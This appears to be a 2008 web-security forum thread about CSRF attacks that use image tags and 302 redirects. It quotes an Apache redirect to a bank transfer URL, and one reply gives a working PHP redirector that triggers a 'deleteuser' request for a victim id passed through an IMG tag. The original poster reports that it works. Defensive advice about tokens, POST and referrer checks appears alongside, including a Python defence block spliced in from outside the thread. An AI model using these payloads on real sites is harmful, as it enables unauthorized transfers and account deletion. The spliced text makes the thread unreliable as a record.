302 Redirect in the httpd.conf
Posted by: ted
Date: March 19, 2008 04:04AM

Hi, all
I've been trying CSRF for a while now, and am surprised at just how many sites are vulnerable.
In "Cross Site Scripting Attacks: XSS Exploits and Defense", page 111 says:
Quote

"
......
This is an example Apache redirection in the httpd.conf or .htaccess file:
Redirect 302 /a.jpg https://somebank.com/transferfunds.asp?amnt=1000000&acct=123456
......
"
And I found it can work. Is there any way to get around this to protect our users?

_______________________________________________________________
Nature is wonderful!
One million years ago, she didn't know we were going to need glasses.
But look where she put our ears!

Re: 302 Redirect in the httpd.conf
Posted by: Gareth Heyes
Date: March 19, 2008 04:26AM

@ted

Form tokens or referrer checking (to some extent) will protect users.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: 302 Redirect in the httpd.conf
Date: March 19, 2008 09:02AM

Take Gareth's advice, and use nonces, POST requests, and referrer checking combined for a more secure application. It never hurts to layer your security.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: 302 Redirect in the httpd.conf
Posted by: Gareth Heyes
Date: March 19, 2008 09:04AM

Yeah, good point. POST requests should be used when changing the state of your application, but even so, using them alone will not protect you from CSRF; it only prevents the type stated in this thread.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]
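The layered defence the two replies above describe (state changes only over POST, a referrer/origin check, and a per-session form token), worked through as an added Python illustration that is not code from the thread; the site origin, the dict shape of the request and the header names are assumptions. It also shows why the GET produced by the book's `Redirect 302 /a.jpg ...` trick is stopped at the first layer.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.somebank.example"  # assumed origin of the protected app

def issue_token(session: dict) -> str:
    """Mint a per-session anti-CSRF token and store it server-side.

    The app puts it in a hidden <input name="csrf_token"> on every
    state-changing form; a cross-site <img> or 302 redirect can make the
    browser send a request but cannot read this value.
    """
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def check_state_change(request: dict, session: dict) -> tuple:
    """Return (allowed, reason) for a request that would change state.

    request = {"method": ..., "headers": {...}, "form": {...}}.
    Layer 1: only POST may change state, so the GET produced by
             "Redirect 302 /a.jpg ..." is refused outright.
    Layer 2: Origin (or Referer as fallback) must be our own site.
    Layer 3: the submitted token must match the session's token.
    """
    if request["method"].upper() != "POST":
        return False, "state change must use POST"
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    source = headers.get("origin") or headers.get("referer")
    if not source:  # neither header: same-site cannot be shown, so refuse
        return False, "missing Origin/Referer"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False, "cross-site Origin/Referer"
    expected = session.get("csrf_token", "")
    supplied = request.get("form", {}).get("csrf_token", "")
    # Constant-time compare on bytes so odd input cannot raise TypeError.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid form token"
    return True, "ok"

if __name__ == "__main__":
    sess = {}
    tok = issue_token(sess)
    # Constructed request: what a browser sends after the book's 302 redirect.
    img_get = {"method": "GET", "headers": {"Referer": "http://blog.example/"}, "form": {}}
    print(check_state_change(img_get, sess))  # (False, 'state change must use POST')
    form_post = {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
                 "form": {"csrf_token": tok, "amnt": "100"}}
    print(check_state_change(form_post, sess))  # (True, 'ok')
```

A request carrying `Origin: null` (sent from sandboxed or data: contexts) also fails the origin layer, since it does not parse to the site's scheme and host.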

Re: 302 Redirect in the httpd.conf
Posted by: ted
Date: May 30, 2008 03:48AM

Thanks so much. I found that many websites couldn't realize the CSRF attack in this way, and use the GET method to request the data.

But in some cases, they set the user id as one of the parameters, such as
Quote

Redirect 302 /a.jpg http://www.somebank.com/transferfuns.php?user_id_from=1231&user_id_to=2221&count=1000000000000
That means one picture can only attack one person. I am thinking about whether we can post a comment on someone's blog with a picture like this:
<img src="http://www.evilsite.com/a.jpg?user_id_from=1231">
and on the server side, evilsite.com will put the user_id_from into the httpd.conf.

In this case, we would not need to change the httpd.conf every time we attack someone.

Would it be possible?

_______________________________________________________________
Nature is wonderful!
One million years ago, she didn't know we were going to need glasses.
But look where she put our ears!


Re: 302 Redirect in the httpd.conf
Date: May 30, 2008 09:09AM

It took me a second read to understand exactly what you were asking, but yes, it is possible to specify a value inside of a parameter which will be sent to the server-side script upon being viewed, subsequently causing the browser to issue an HTTP GET request. You will need a bit more work than just modifying the .htaccess or the httpd.conf file in order to achieve the desired effect; however, it is still done easily with a small amount of PHP or Perl. Basically your script would look similar to this:
<?php
// If a "victimid" parameter is present, redirect the browser to the target
// URL with that id appended; otherwise fall through and serve a real image.
if (isset($_GET["victimid"]))
{
    $UserID = urlencode($_GET["victimid"]); // keep the value inside the query string
    header("Location: http://www.targetsite.com/filename.file?csrf=deleteuser&id=" . $UserID);
    exit;
}
else
{
    // Execute some code to display an image, or something.
}
Then you would simply post an IMG tag pointing to your script, where you would manually supply the value in the "victimid" variable.
<img src="http://www.thirdpartywebsite.com/csrfexample.php?victimid=12345">


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: 302 Redirect in the httpd.conf
Posted by: ted
Date: June 03, 2008 08:58PM

Thanks Awesome, it works!
